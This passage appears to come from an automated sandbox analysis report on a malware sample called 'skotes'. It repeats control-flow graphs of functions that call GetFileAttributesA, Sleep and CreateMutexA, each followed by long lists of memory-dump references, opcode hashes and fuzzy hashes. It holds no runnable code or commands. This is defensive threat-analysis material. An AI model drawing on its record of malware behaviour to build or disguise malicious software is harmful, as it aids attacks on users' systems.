                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: 70e2e191bcc851a7360bd47111f51c851e71a6187fb695a19859be2d385f3028
                                                                                                                • Instruction ID: 6863838e45465f6505bc6758ffc8b2991e5c16ac744102bfc2b5fc9d8a7790a8
                                                                                                                • Opcode Fuzzy Hash: 70e2e191bcc851a7360bd47111f51c851e71a6187fb695a19859be2d385f3028
                                                                                                                • Instruction Fuzzy Hash: 82316A71784244DBEB18EB78DC8D76DBB62EB86310F24821DE1149B3D6D73E59808762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1567 789cda-789cfa GetFileAttributesA 1570 789d28-789d44 1567->1570 1571 789cfc-789d08 1567->1571 1572 789d72-789d91 1570->1572 1573 789d46-789d52 1570->1573 1574 789d0a-789d18 1571->1574 1575 789d1e-789d25 call 79d663 1571->1575 1578 789dbf-78a916 call 7980c0 1572->1578 1579 789d93-789d9f 1572->1579 1576 789d68-789d6f call 79d663 1573->1576 1577 789d54-789d62 1573->1577 1574->1575 1580 78a921 1574->1580 1575->1570 1576->1572 1577->1576 1577->1580 1583 789da1-789daf 1579->1583 1584 789db5-789dbc call 79d663 1579->1584 1586 78a953-78a987 Sleep CreateMutexA 1580->1586 1587 78a921 call 7b6c6a 1580->1587 1583->1580 1583->1584 1584->1578 1596 78a98e-78a994 1586->1596 1587->1586 1597 78a996-78a998 1596->1597 1598 78a9a7-78a9a8 1596->1598 1597->1598 1599 78a99a-78a9a5 1597->1599 1599->1598 1601 78a9a9-78a9b0 call 7b6629 1599->1601
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00789CDD
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: 841fa23c64385589abe43c9a56b55a5d13637700f49e7b2708504a1fd3a93a8d
                                                                                                                • Instruction ID: 7ae472f0b729611f51d507137d9002e788a63f909d6a0a8e58f95a064de5b4c7
                                                                                                                • Opcode Fuzzy Hash: 841fa23c64385589abe43c9a56b55a5d13637700f49e7b2708504a1fd3a93a8d
                                                                                                                • Instruction Fuzzy Hash: 37312771744240DBEF18ABB8D8CC7ADBA62EB86310F284619E1149B3D5D73D99808766

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1604 789f44-789f64 GetFileAttributesA 1607 789f92-789fae 1604->1607 1608 789f66-789f72 1604->1608 1611 789fdc-789ffb 1607->1611 1612 789fb0-789fbc 1607->1612 1609 789f88-789f8f call 79d663 1608->1609 1610 789f74-789f82 1608->1610 1609->1607 1610->1609 1615 78a92b 1610->1615 1613 78a029-78a916 call 7980c0 1611->1613 1614 789ffd-78a009 1611->1614 1617 789fbe-789fcc 1612->1617 1618 789fd2-789fd9 call 79d663 1612->1618 1620 78a00b-78a019 1614->1620 1621 78a01f-78a026 call 79d663 1614->1621 1623 78a953-78a987 Sleep CreateMutexA 1615->1623 1624 78a92b call 7b6c6a 1615->1624 1617->1615 1617->1618 1618->1611 1620->1615 1620->1621 1621->1613 1633 78a98e-78a994 1623->1633 1624->1623 1634 78a996-78a998 1633->1634 1635 78a9a7-78a9a8 1633->1635 1634->1635 1636 78a99a-78a9a5 1634->1636 1636->1635 1638 78a9a9-78a9b0 call 7b6629 1636->1638
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00789F47
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: d4c0d6e4176f5859898691bc2d2dc2e1c9a677253d96bd6eb877125995981c01
                                                                                                                • Instruction ID: 66745a85dfb20836e11ae33cfa9c90b55034f41cabf9c4675f3363703c9b89ee
                                                                                                                • Opcode Fuzzy Hash: d4c0d6e4176f5859898691bc2d2dc2e1c9a677253d96bd6eb877125995981c01
                                                                                                                • Instruction Fuzzy Hash: E7311531744244EBEB1CABA8D88D7ADBA62EB85310F24421AE154DB2D5D73D59808752

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1641 78a079-78a099 GetFileAttributesA 1644 78a09b-78a0a7 1641->1644 1645 78a0c7-78a0e3 1641->1645 1648 78a0a9-78a0b7 1644->1648 1649 78a0bd-78a0c4 call 79d663 1644->1649 1646 78a111-78a130 1645->1646 1647 78a0e5-78a0f1 1645->1647 1654 78a15e-78a916 call 7980c0 1646->1654 1655 78a132-78a13e 1646->1655 1652 78a0f3-78a101 1647->1652 1653 78a107-78a10e call 79d663 1647->1653 1648->1649 1650 78a930-78a987 call 7b6c6a Sleep CreateMutexA 1648->1650 1649->1645 1670 78a98e-78a994 1650->1670 1652->1650 1652->1653 1653->1646 1660 78a140-78a14e 1655->1660 1661 78a154-78a15b call 79d663 1655->1661 1660->1650 1660->1661 1661->1654 1671 78a996-78a998 1670->1671 1672 78a9a7-78a9a8 1670->1672 1671->1672 1673 78a99a-78a9a5 1671->1673 1673->1672 1675 78a9a9-78a9b0 call 7b6629 1673->1675
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 0078A07C
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
                                                                                                                • Opcode ID: 8a2683a3e449145291a29919316d0760408797a5d223b66bec01ff1aa5394618
                                                                                                                • Instruction ID: d069f04a71341b5da7c1b8b2a807c8b5a43016ffde4d9906f82244eae6e39740
                                                                                                                • Opcode Fuzzy Hash: 8a2683a3e449145291a29919316d0760408797a5d223b66bec01ff1aa5394618
                                                                                                                • Instruction Fuzzy Hash: A4310931B94244EBFB18ABB8DC8D75DBB72EB85310F24425EE0149B3D5D73D59808752

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1678 78a1ae-78a1ce GetFileAttributesA 1681 78a1fc-78a218 1678->1681 1682 78a1d0-78a1dc 1678->1682 1685 78a21a-78a226 1681->1685 1686 78a246-78a265 1681->1686 1683 78a1de-78a1ec 1682->1683 1684 78a1f2-78a1f9 call 79d663 1682->1684 1683->1684 1689 78a935 1683->1689 1684->1681 1691 78a228-78a236 1685->1691 1692 78a23c-78a243 call 79d663 1685->1692 1687 78a293-78a916 call 7980c0 1686->1687 1688 78a267-78a273 1686->1688 1694 78a289-78a290 call 79d663 1688->1694 1695 78a275-78a283 1688->1695 1698 78a953-78a987 Sleep CreateMutexA 1689->1698 1699 78a935 call 7b6c6a 1689->1699 1691->1689 1691->1692 1692->1686 1694->1687 1695->1689 1695->1694 1707 78a98e-78a994 1698->1707 1699->1698 1708 78a996-78a998 1707->1708 1709 78a9a7-78a9a8 1707->1709 1708->1709 1710 78a99a-78a9a5 1708->1710 1710->1709 1712 78a9a9-78a9b0 call 7b6629 1710->1712
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 0078A1B1
                                                                                                                • Sleep.KERNELBASE(00000064,?), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 396266464-3459864372
